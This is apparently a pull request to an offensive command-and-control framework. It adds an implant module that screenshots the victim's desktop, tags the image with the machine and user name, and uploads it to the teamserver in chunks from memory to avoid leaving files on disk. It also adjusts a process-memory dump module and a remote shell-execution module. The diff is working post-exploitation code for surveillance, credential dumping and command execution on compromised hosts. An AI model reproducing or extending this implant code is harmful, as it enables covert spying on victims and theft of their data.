### PR TITLE
add screenshot module and uploadasbytes

### DIFF
--- a/core/teamserver/modules/boo/minidump.py
+++ b/core/teamserver/modules/boo/minidump.py
@@ -21,7 +21,7 @@ class STModule(Module):
             'Dumpfile': {
                 'Description': 'The Path of the dumpfile',
                 'Required': False,
-                'Value': "C:\\\\WINDOWS\\\\Temp\\\\debug.bin"
+                'Value': r"C:\WINDOWS\Temp\debug.bin"
             },
             'ProcessName': {
                 'Description': 'Process name to dump',

--- a/core/teamserver/modules/boo/minidump.py
+++ b/core/teamserver/modules/boo/minidump.py
@@ -40,7 +40,7 @@ class STModule(Module):
     def process(self, context, output):
         if self._new_dmp_file == True:
             self._new_dmp_file = False
-            self.gzip_file = f"./data/logs/{context.session.guid}/minidump_{datetime.now().strftime('%Y_%m_%d_%H%M%S')}.gzip"
+            self.gzip_file = f"./data/logs/{context.session.guid}/minidump_{datetime.now().strftime('%Y_%m_%d_%H%M%S')}.gz"
             self.decompressed_file = f"./data/logs/{context.session.guid}/minidump_{datetime.now().strftime('%Y_%m_%d_%H%M%S')}.bin"
 
         try:

--- a/core/teamserver/modules/boo/screenshot.py
+++ b/core/teamserver/modules/boo/screenshot.py
@@ -1,0 +1,43 @@
+import gzip
+import logging
+import json
+from base64 import b64decode
+from core.teamserver.module import Module
+
+
+class STModule(Module):
+    def __init__(self):
+        self.name = 'boo/screenshot'
+        self.language = 'boo'
+        self.description = 'Takes a screenshot of the current desktop'
+        self.author = '@daddycocoaman'
+        self.references = []
+        self.options = {}
+
+    def payload(self):
+        with open('core/teamserver/modules/boo/src/screenshot.boo', 'r') as module_src:
+            src = module_src.read()
+            return src
+
+    def process(self, context, output):
+        try:
+            filename = output['filename']
+            self.gzip_file = f"./data/logs/{context.session.guid}/screenshot_{filename}.gz"
+            self.decompressed_file = f"./data/logs/{context.session.guid}/screenshot_{filename}.jpg"
+
+            file_chunk = output['data']
+            with open(self.gzip_file, 'ab+') as reassembled_gzip_data:
+                reassembled_gzip_data.write(b64decode(file_chunk))
+
+            if output['current_chunk_n'] == (output['chunk_n'] + 1):
+                try:
+                    with open(self.decompressed_file, 'wb') as reassembled_file:
+                        with gzip.open(self.gzip_file) as compressed_screenie:
+                            reassembled_file.write(compressed_screenie.read())
+                except Exception as e:
+                    logging.error(f"Error decompressing re-assembled screenshot: {e}")        
+                return f"Saved screenshot to {self.decompressed_file}!"
+            else:
+                return f"Processed chunk {output['current_chunk_n']}/{output['chunk_n'] + 1}"        
+        except TypeError:
+            return output

--- a/core/teamserver/modules/boo/shell.py
+++ b/core/teamserver/modules/boo/shell.py
@@ -17,7 +17,7 @@ class STModule(Module):
             'Path': {
                 'Description'   :   'The Path of the directory from which to execute the ShellCommand',
                 'Required'      :   False,
-                'Value'         :   "C:\\\\WINDOWS\\\\System32\\\\"
+                'Value'         :   r"C:\WINDOWS\System32"
             },
             'Username': {
                 'Description'   :   'Optional alternative username to execute ShellCommand as',

--- a/core/teamserver/modules/boo/src/cd.boo
+++ b/core/teamserver/modules/boo/src/cd.boo
@@ -5,7 +5,7 @@ import System
 import System.IO
 
 public static def Main():
-    path = "PATH"
+    path = `PATH`
     print "[*] Actual directory: " + Directory.GetCurrentDirectory() + "\r\n"
     print "[*] Going to directory: " + path + "\r\n"
     Directory.SetCurrentDirectory(path)

--- a/core/teamserver/modules/boo/src/ls.boo
+++ b/core/teamserver/modules/boo/src/ls.boo
@@ -5,7 +5,7 @@ import System
 import System.IO
 
 public static def Main():
-    path = "PATH"
+    path = `PATH`
     if not path:
         path = Directory.GetCurrentDirectory()
     print "[*] Listing content of directory: " + path + "\r\n"

--- a/core/teamserver/modules/boo/src/minidump.boo
+++ b/core/teamserver/modules/boo/src/minidump.boo
@@ -15,7 +15,7 @@ public static def IsHighIntegrity() as bool:
 
 public static def Start(job as duck):
     procname = "PROCESS_NAME"
-    file = "DUMPFILE_PATH"
+    file = `DUMPFILE_PATH`
 
     if IsHighIntegrity():
         print "[+] Running in high integrity process"

--- a/core/teamserver/modules/boo/src/screenshot.boo
+++ b/core/teamserver/modules/boo/src/screenshot.boo
@@ -1,0 +1,26 @@
+#Reference: https://stackoverflow.com/a/1163770
+
+import System.Windows.Forms
+import System.Drawing
+import System.IO
+import System.IO.Compression
+import System
+
+public static def Start(job as duck):
+    bounds = Screen.GetBounds(Point.Empty)
+    bitmap = Bitmap(bounds.Width, bounds.Height)
+    graph = Graphics.FromImage(bitmap)
+    graph.CopyFromScreen(Point.Empty, Point.Empty, bounds.Size)
+
+    timestamp = String.Format("{0:yyyyMMdd_hhmmss}", DateTime.Now)
+    filename = "$(Environment.MachineName)_$(Environment.UserName)_$(timestamp)"
+
+    using memStream = MemoryStream():
+        using outStream = MemoryStream():
+            using gStream = GZipStream(outStream, CompressionMode.Compress):
+                bitmap.Save(memStream, Imaging.ImageFormat.Jpeg)
+                bytes = memStream.ToArray()
+                gStream.Write(bytes, 0, bytes.Length)
+            outBytes = outStream.ToArray()
+
+    job.UploadAsBytes(outBytes, filename)

--- a/core/teamserver/modules/boo/src/shell.boo
+++ b/core/teamserver/modules/boo/src/shell.boo
@@ -36,4 +36,4 @@ public static def ShellExecute(ShellCommand as string, Path as string, Username 
     return output
 
 public static def Main():
-    print ShellExecute(ShellCommand="COMMAND_TO_RUN", Path="C:\\WINDOWS\\System32\\", Username="USERNAME", Domain="DOMAIN", Password="PASSWORD")
+    print ShellExecute(ShellCommand="COMMAND_TO_RUN", Path=`PATH`, Username="USERNAME", Domain="DOMAIN", Password="PASSWORD")


### PR DESCRIPTION
Added a module to take screenshots. Additional options could be added later, such as taking screenshots at intervals. 

In order to avoid writing to disk, the picture data is put into memory and the array of bytes is sent to the server in chunks to be saved. 

Also, changed the mimidump module to use `gz` not `gzip`, just for normal convention sake, and to avoid having to rename it when using tools like `gunzip`.

![image](https://user-images.githubusercontent.com/21189155/64590771-23598780-d35d-11e9-95b2-834c63105bf8.png)
